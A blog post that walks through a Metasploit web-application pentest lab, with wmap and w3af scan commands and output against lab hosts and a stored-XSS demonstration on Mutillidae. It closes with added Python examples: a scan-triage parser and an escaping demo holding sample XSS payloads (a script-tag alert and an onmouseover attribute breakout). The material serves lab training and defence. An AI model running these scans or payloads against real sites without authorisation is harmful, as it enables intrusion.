f10@t's blog

Metasploit Penetration Testing Devil Training Camp: Web Application Penetration

Word count: 6.7k  Reading time: 38 min
2019/02/07

OWASP Top 10 - 2017

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Web application penetration techniques based on the Metasploit framework

Auxiliary modules

These modules live under auxiliary; web application auxiliary scanning and vulnerability discovery are all found there. For convenience, the wmap plugin can drive the scan. Below, 10.10.10.129 is scanned.

msf5 > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf5 > wmap_sites
[*] Usage: wmap_sites [options]
-h Display this help text
-a [url] Add site (vhost,url)
-d [ids] Delete sites (separate ids with space)
-l List all available sites
-s [id] Display site structure (vhost,url|ids) (level) (unicode output true/false)

msf5 > wmap_sites -a 10.10.10.129
[*] Site created.
msf5 > wmap_sites -a 10.10.10.130
[*] Site created.
msf5 > wmap_sites -a 10.10.10.254
[*] Site created.
msf5 > wmap_sites -l
[*] Available sites
===============

Id Host Vhost Port Proto # Pages # Forms
-- ---- ----- ---- ----- ------- -------
0 10.10.10.129 10.10.10.129 80 http 0 0
1 10.10.10.130 10.10.10.130 80 http 0 0
2 10.10.10.254 10.10.10.254 80 http 0 0

msf5 > wmap_targets -d 0
[*] Loading 10.10.10.129,http://10.10.10.129:80/.
msf5 > wmap_run
[*] Usage: wmap_run [options]
-h Display this help text
-t Show all enabled modules
-m [regex] Launch only modules that name match provided regex.
-p [regex] Only test path defined by regex.
-e [/path/to/profile] Launch profile modules against all matched targets.
(No profile file runs all enabled modules.)

# Show which modules will be used in the scan
msf5 > wmap_run -t
[*] Testing target:
[*] Site: 10.10.10.129 (10.10.10.129)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. 2019-02-07 14:30:31 +0800
[*] Loading wmap modules...
[*] 39 wmap enabled modules loaded.
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[*] Module auxiliary/scanner/http/frontpage_login
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/scraper
[*] Module auxiliary/scanner/http/svn_scanner
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] Module auxiliary/scanner/http/webdav_website_content
[*]
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Module auxiliary/scanner/http/dir_scanner
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Module auxiliary/scanner/http/files_dir
[*] Module auxiliary/scanner/http/http_put
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Module auxiliary/scanner/http/trace_axd
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*]
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*]
=[ Query testing ]=
============================================================
[*]
=[ General testing ]=
============================================================
[*] Done.

# Run the scan and carry out the checks
msf5 > wmap_run -e
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] Site: 10.10.10.129 (10.10.10.129)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. 2019-02-07 14:47:50 +0800
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[+] 10.10.10.129:80 Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Attempting to connect to 10.10.10.129:80
[+] No File(s) found
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[-] 10.10.10.129 does not appear to be vulnerable, will not continue
[*] Module auxiliary/scanner/http/frontpage_login
[*] 10.10.10.129:80 - http://10.10.10.129/ may not support FrontPage Server Extensions
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[+] 10.10.10.129 allows GET,HEAD,POST,OPTIONS,TRACE methods
[+] 10.10.10.129:80 - TRACE method allowed.
[*] Module auxiliary/scanner/http/robots_txt
[*] [10.10.10.129] /robots.txt found
[+] Contents of Robots.txt:
User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/

[*] Module auxiliary/scanner/http/scraper
[+] [10.10.10.129] / [Free CSS template by ChocoTemplates.com]
[*] Module auxiliary/scanner/http/svn_scanner
[*] Using code '404' as not found.
[+] [10.10.10.129:80] SVN Entries file found.
[-] [10.10.10.129] Version 0 not supported
[*] Module auxiliary/scanner/http/trace
[+] 10.10.10.129:80 is vulnerable to Cross-Site Tracing
[-] Auxiliary failed: NoMethodError undefined method `id' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:295:in `report_vuln'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/http/trace.rb:47:in `run_host'
[-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:111:in `block (2 levels) in run'
[-] /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'
[*] Module auxiliary/scanner/http/vhost_scanner
[*] >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.
[*] Module auxiliary/scanner/http/webdav_website_content
[*]
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Path: /
[*] Using code '404' as not found.
[+] Found http://10.10.10.129:80/js/ 200
[+] Found http://10.10.10.129:80/op/ 200
[+] Found http://10.10.10.129:80/css/ 200
[+] Found http://10.10.10.129:80/doc/ 403
[+] Found http://10.10.10.129:80/ops/ 200
[+] Found http://10.10.10.129:80/tmp/ 200
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Path: /
[*] Module auxiliary/scanner/http/dir_scanner
[*] Path: /
[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.129
[+] Found http://10.10.10.129:80/1111/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/11/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/3/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123321/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1337/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/00001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/0/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/0001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/111/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/04/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/10/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/2/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/007/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1000/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123123/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/4/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/8/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/777/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/6/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/606/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/9/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/7/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/911911/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/666/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/5/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/CHANGELOG/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/LICENSE/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/administrator/ 302 (10.10.10.129)
[+] Found http://10.10.10.129:80/cache/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/cgi-bin/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/components/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/css/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/doc/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/f/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/gallery2/ 302 (10.10.10.129)
[+] Found http://10.10.10.129:80/ghost/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/icons/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/images/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/includes/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/installation/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/javascript/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/js/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/language/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/libraries/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/login/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/logs/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/media/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/modules/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/phpBB2/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/plugins/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/phpmyadmin/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/templates/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/tmp/ 404 (10.10.10.129)
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/files_dir
[*] Path: /
[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://10.10.10.129:80/index.html 200
[+] Found http://10.10.10.129:80/index2.html 200
[+] Found http://10.10.10.129:80/signin.html 200
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[+] Found http://10.10.10.129:80/index.php 302
[+] Found http://10.10.10.129:80/index2.php 302
[+] Found http://10.10.10.129:80/login.php 500
[+] Found http://10.10.10.129:80/signin.php 500
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension
[+] Found http://10.10.10.129:80/administrator 301
[+] Found http://10.10.10.129:80/cache 301
[+] Found http://10.10.10.129:80/cgi-bin 301
[+] Found http://10.10.10.129:80/contact 200
[+] Found http://10.10.10.129:80/css 301
[+] Found http://10.10.10.129:80/images 301
[+] Found http://10.10.10.129:80/includes 301
[+] Found http://10.10.10.129:80/installation 301
[+] Found http://10.10.10.129:80/index 200
[+] Found http://10.10.10.129:80/index2 302
[+] Found http://10.10.10.129:80/javascript 301
[+] Found http://10.10.10.129:80/js 301
[+] Found http://10.10.10.129:80/login 500
[+] Found http://10.10.10.129:80/libraries 301
[+] Found http://10.10.10.129:80/logs 301
[+] Found http://10.10.10.129:80/modules 301
[+] Found http://10.10.10.129:80/phpmyadmin 301
[+] Found http://10.10.10.129:80/signin 200
[+] Found http://10.10.10.129:80/templates 301
[+] Found http://10.10.10.129:80/tmp 301
[+] Found http://10.10.10.129:80/xmlrpc 301
[*] Using code '404' as not found for files with extension
[+] Found http://10.10.10.129:80/administrator 301
[+] Found http://10.10.10.129:80/cache 301
[+] Found http://10.10.10.129:80/cgi-bin 301
[+] Found http://10.10.10.129:80/contact 200
[+] Found http://10.10.10.129:80/css 301
[+] Found http://10.10.10.129:80/images 301
[+] Found http://10.10.10.129:80/includes 301
[+] Found http://10.10.10.129:80/index 200
[+] Found http://10.10.10.129:80/installation 301
[+] Found http://10.10.10.129:80/index2 302
[+] Found http://10.10.10.129:80/javascript 301
[+] Found http://10.10.10.129:80/js 301
[+] Found http://10.10.10.129:80/libraries 301
[+] Found http://10.10.10.129:80/login 500
[+] Found http://10.10.10.129:80/logs 301
[+] Found http://10.10.10.129:80/modules 301
[+] Found http://10.10.10.129:80/phpmyadmin 301
[+] Found http://10.10.10.129:80/signin 200
[+] Found http://10.10.10.129:80/templates 301
[+] Found http://10.10.10.129:80/tmp 301
[+] Found http://10.10.10.129:80/xmlrpc 301
[*] Module auxiliary/scanner/http/http_put
[*] Path: /
[-] 10.10.10.129: File doesn't seem to exist. The upload probably failed
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Path: /
[-] 10.10.10.129:80 Folder does not require authentication. [405]
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Path: /
[*] Starting scan with 0ms delay between requests
[*] Server 10.10.10.129:80 returned HTTP 404 for /. Use a different one.
[*] Module auxiliary/scanner/http/trace_axd
[*] Path: /
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*]
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*]
=[ Query testing ]=
============================================================
[*]
=[ General testing ]=
============================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Launch completed in 778.7549073696136 seconds.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[*] Done.

# View the results
msf5 > vulns

Vulnerabilities
===============

Timestamp Host Name References
--------- ---- ---- ----------
2019-02-07 06:49:59 UTC 10.10.10.129 HTTP Trace Method Allowed CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561
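The wmap output above is long and most of it is noise (the 503 responses are the server throttling the brute-force, not real directories). The following Python script is an added example, not code from the book, the blog or Metasploit: it parses constructed lines in the shape of the wmap_run output, records the methods advertised via OPTIONS and flags TRACE (the cross-site tracing finding recorded by vulns), correlates the robots.txt Disallow entries with the directory-scan hits, and drops 503s. The sample lines and the list of sensitive path prefixes are assumptions for the example.

```python
"""Triage helper for wmap scan output (added example, not from the original post)."""
import json
import re
from collections import defaultdict

# Constructed sample, abridged to the shape of the wmap_run output (not a real capture)
SAMPLE_OUTPUT = """\
[+] 10.10.10.129 allows GET,HEAD,POST,OPTIONS,TRACE methods
[+] 10.10.10.129:80 - TRACE method allowed.
[+] Contents of Robots.txt:
User-agent: *
Disallow: /administrator/
Disallow: /installation/
Disallow: /tmp/
[+] Found http://10.10.10.129:80/1111/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/administrator/ 302 (10.10.10.129)
[+] Found http://10.10.10.129:80/installation/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/phpmyadmin/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/tmp/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/index.php 302
"""

METHODS_RE = re.compile(r"^\[\+\] \S+ allows ([A-Z,]+) methods$")
FOUND_RE = re.compile(r"^\[\+\] Found (https?://[^/]+)(/\S*) (\d{3})")
DISALLOW_RE = re.compile(r"^Disallow:\s*(\S+)")

# Paths whose mere presence on a production host deserves a ticket
# (assumed list for this example; tune it to the environment)
SENSITIVE_PREFIXES = ("/administrator", "/installation", "/phpmyadmin")


def parse_wmap(text):
    """Return (advertised methods, robots.txt disallowed paths, {path: status})."""
    methods = set()
    disallowed = set()
    hits = {}  # path -> HTTP status; a later hit for the same path overwrites
    for line in text.splitlines():
        m = METHODS_RE.match(line)
        if m:
            methods.update(m.group(1).split(","))
            continue
        m = DISALLOW_RE.match(line)
        if m:
            disallowed.add(m.group(1).rstrip("/"))
            continue
        m = FOUND_RE.match(line)
        if m:
            hits[m.group(2).rstrip("/")] = int(m.group(3))
    return methods, disallowed, hits


def triage(text):
    """Reduce raw scanner lines to a list of findings a defender can act on."""
    methods, disallowed, hits = parse_wmap(text)
    findings = []
    if "TRACE" in methods:
        findings.append("TRACE enabled: disable it (Apache: TraceEnable off)")

    by_status = defaultdict(list)
    for path, status in hits.items():
        if status == 503:  # throttled brute-force requests, not real content
            continue
        by_status[status].append(path)

    # robots.txt names the path AND the scanner confirms it is reachable
    confirmed = sorted(p for p in disallowed if hits.get(p, 404) not in (404, 503))
    for p in confirmed:
        findings.append(f"robots.txt-listed path reachable: {p} ({hits[p]})")

    # other sensitive paths that answered with content or a redirect
    for p in sorted(hits):
        if p.startswith(SENSITIVE_PREFIXES) and hits[p] in (200, 301, 302) and p not in confirmed:
            findings.append(f"sensitive path exposed: {p} ({hits[p]})")

    return {"methods": sorted(methods), "by_status": dict(by_status), "findings": findings}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_OUTPUT), indent=2))
```

On the sample, the script reports four findings: TRACE enabled, /administrator and /installation both named in robots.txt and confirmed reachable, and /phpmyadmin answering 200. A leftover installer directory returning 200 is the kind of misconfiguration the OWASP list above calls out, and robots.txt is doing the scanner's reconnaissance for it.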

Exploit modules

Metasploit's exploit modules for various web applications are spread across several folders under modules, such as exploit/unix/webapp, exploit/windows/http and exploit/multi/http. There are also exploits for mainstream CMSs (WordPress, Joomla) and for various databases, as well as web shells (PHP and JSP) used to operate the target after a successful exploit. If a module you need is missing, you can write your own and load it.

Beyond that, Metasploit also provides interfaces to mainstream scanners and penetration testing tools: W3AF, SQLMap, BeEF, and others.

Web application vulnerability scanning and detection

Scanners

Here we introduce a good scanner, w3af (Web Application Attack and Audit Framework). The tool has two parts: the core and the plugins. (PS: honestly, this tool is rather troublesome to set up... here are a few helpful articles:

  • https://blog.csdn.net/f786548139/article/details/80604586
  • https://blog.csdn.net/weixin_34744507/article/details/83049215

The tool has both a graphical interface and a command-line interface, w3af_gui and w3af_console respectively, as shown in the figures: w3af_gui, w3af_console

Below, the tool is used from the command-line interface to scan http://www.dvssc.com/dvwa/index.php

w3af>>> plugins 
w3af/plugins>>> audit xss, sqli
w3af/plugins>>> crawl web_spider
w3af/plugins>>> crawl config web_spider
w3af/plugins/crawl/config:web_spider>>>
set help keys back exit print save view
w3af/plugins/crawl/config:web_spider>>> set
only_forward follow_regex ignore_regex
w3af/plugins/crawl/config:web_spider>>> set only_forward true
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.
w3af/plugins>>> output html_file
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start

Scan results:

w3af also ships with various handy small tools, such as: base64encode, base64decode, gencc (generates fake credit card data and the like), md5hash, sha1hash, urlencode, urldecode.

SQL injection detection

msf also has an SQLMap interface; its use is not detailed here. Detection can also be done manually.

XSS vulnerability detection

There are three main kinds of XSS: stored XSS, reflected XSS and DOM-based XSS. In the lab environment, a Mutillidae blog system sits under the DingV main page:

Use w3af to detect XSS vulnerabilities:

root@attacker:~/Desktop/w3af# ./w3af_console 
w3af>>> plugins

# xss plugin
w3af/plugins>>> audit xss

# crawl plugin
w3af/plugins>>> crawl web_spider
w3af/plugins>>> crawl config web_spider
w3af/plugins/crawl/config:web_spider>>> set only_forward true
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.

# output plugin
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set
template output_file verbose
w3af/plugins/output/config:html_file>>> set verbose true
w3af/plugins/output/config:html_file>>> set output_file /root/dvssc_blog.html
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back

# set the target
w3af>>> target
w3af/config:target>>>
set help keys back exit print save view
w3af/config:target>>> set target
target_os target_framework target
w3af/config:target>>> set target http://www.dvssc.com/mutillidae/index.php
w3af/config:target>>> back
The configuration has been saved.

# start the scan
w3af>>> start
New URL found by web_spider plugin: "http://www.dvssc.com/mutillidae/index.php"
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...user_name=..." which modifies the "user_name" parameter. This vulnerability was found in the request with id 243.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=view-someones-blog.php", using HTTP method POST. The sent post-data was: "show_only_user=&Submit_button=Submit" which modifies the "show_only_user" parameter. This vulnerability was found in the request with id 255.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...password=..." which modifies the "password" parameter. This vulnerability was found in the request with id 271.
Found 1 URLs and 28 different injections points.
The URL list is:
- http://www.dvssc.com/mutillidae/index.php
The list of fuzzable requests is:
- Method: GET | http://www.dvssc.com/mutillidae/index.php
- Method: GET | http://www.dvssc.com/mutillidae/index.php
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (page, php_file_name, submit)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (target_host, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, password_confirm, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (view_user_name, password, Submit_button)
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php", using HTTP method GET. The sent data was: "php_file_name=&page=source-viewer.php&submit=Submit" The modified parameter was "php_file_name". This vulnerability was found in the request with id 384.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=user-info.php", using HTTP method POST. The sent post-data was: "view_user_name=&password=FrAmE30.&Submit_button=Submit" which modifies the "view_user_name" parameter. This vulnerability was found in the request with id 386.
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:552)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:553)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:554)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:555)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:557)
Scan finished in 1 minute 31 seconds
Stopping the core...

The HTML report that was produced:

As the report shows, the blog system has a stored XSS vulnerability.

Web application penetration testing

SQL injection example

XSS cross-site attack example

Since it (www.dvssc.com) has a stored XSS, we make use of it. From my attacking machine, register an account on the blog page; the account can write blog posts:

As can be seen, it applies no protection at all to the special characters in our input, which leads directly to XSS.

The WinXP host on the internal network can also reach this blog (via the route through the Linux Metasploit machine):

Visiting the blog of the registered account triggers the XSS and a pop-up window appears.
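The whole stored XSS comes down to one thing the post observes: special characters in the submitted post are written into the page untouched. The following Python example is added here (it is not code from the post or from Mutillidae, which is written in PHP) and models that defect beside its fix: an author name and post body are interpolated raw into an HTML template, then the same values are rendered through html.escape, and an HTMLParser-based checker reports whether the rendered page contains a script tag or an event-handler attribute. The template and the sample author/body strings are constructed for the example.

```python
"""Stored XSS: unescaped vs. escaped rendering (added example, not from the original post)."""
import html
from html.parser import HTMLParser

# Constructed sample input of the shape a blog visitor would store; the pop-up
# the post describes is exactly a stored body like this rendered for every reader
SAMPLE_BODY = '<script>alert("xss")</script> hello'
# Attribute context: a value that closes the quoted attribute and adds a handler
SAMPLE_AUTHOR = 'eve" onmouseover="alert(1)'


def render_vulnerable(author, body):
    """Raw interpolation: whatever the user typed becomes markup."""
    return f'<div class="post" data-author="{author}"><p>{body}</p></div>'


def render_hardened(author, body):
    """html.escape with quote=True escapes & < > " and ', so the value can
    neither open a tag in the text node nor break out of the quoted attribute."""
    return (
        f'<div class="post" data-author="{html.escape(author, quote=True)}">'
        f'<p>{html.escape(body, quote=True)}</p></div>'
    )


class ActiveMarkupFinder(HTMLParser):
    """Reviewer-side check: walk the rendered page as a browser's tokenizer would
    and record script tags and on* attributes, i.e. markup that can run code."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.hits.append(f"event handler attribute {name}")


def active_markup(rendered):
    """Return the list of executable constructs found in a rendered page."""
    finder = ActiveMarkupFinder()
    finder.feed(rendered)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = render(SAMPLE_AUTHOR, SAMPLE_BODY)
        print(f"{name}: {active_markup(page) or 'clean'}")
        print("   ", page)
```

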